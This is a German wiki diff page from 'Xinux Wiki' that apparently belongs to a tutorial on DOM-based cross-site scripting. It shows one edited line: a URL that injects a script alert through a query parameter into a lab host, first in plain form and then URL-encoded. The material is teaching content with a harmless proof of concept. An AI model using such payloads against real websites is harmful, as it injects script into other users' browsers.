Cross-Site-Scripting "DOM-basiertes" Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 20: Zeile 20:
 
== Exploit über die URL ==
 
== Exploit über die URL ==
  
* http://opfer.secure.local/scripts/xss-dom.html?default=<script>alert("Hacked%20by%20Xinux")</script>
+
http://opfer.secure.local/scripts/xss-dom.html?default=%3Cscript%3Ealert(%22Hacked%20by%20Xinux%22)%3C/script%3E
 
 
 
[[Bild:dom-xss-3.png]]
 
[[Bild:dom-xss-3.png]]

Version vom 7. März 2023, 11:36 Uhr